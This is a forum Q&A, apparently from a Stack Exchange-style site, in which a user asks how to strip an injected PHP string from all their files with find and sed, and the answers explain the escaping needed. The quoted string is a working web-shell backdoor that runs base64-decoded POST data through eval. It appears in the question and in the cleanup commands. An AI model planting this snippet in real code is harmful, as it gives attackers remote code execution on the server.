# Find and replace PHP code in files

Tags: bash, shell, scripting

I have the following string that got injected into every

```
if(@$_POST['test']){eval(base64_decode($_POST['test'])); exit();}php if(@$_POST['test']){eval(base64_decode($_POST['test'])); exit();}
```

How do I remove it?

I am trying the following with not much luck:

```
find /home -type f -exec sed -i 's/if(@$_POST['test']){eval(base64_decode($_POST['test'])); exit();}php if(@$_POST['test']){eval(base64_decode($_POST['test'])); exit();}//g' {} \;
```

Answer (score 0, accepted):

Use the `$''` syntax for your regular expression parameter and escape the delimiting `'`, the `$`, and `[` in it:

```
find /home -type f -exec sed -i $'s/if(@\$_POST\[\'test\']){eval(base64_decode(\$_POST\[\'test\'])); exit();}php if(@\$_POST\[\'test\']){eval(base64_decode(\$_POST\[\'test\'])); exit();}//g' {} \;
```

Answer (score 0):

Your string contains a lot of characters that have special meaning inside of a regular expression (ex. `$(){}[]`).  You'll need to escape all of them in order for `sed` to work.  You'll also need to escape single-quotes with `'\''`.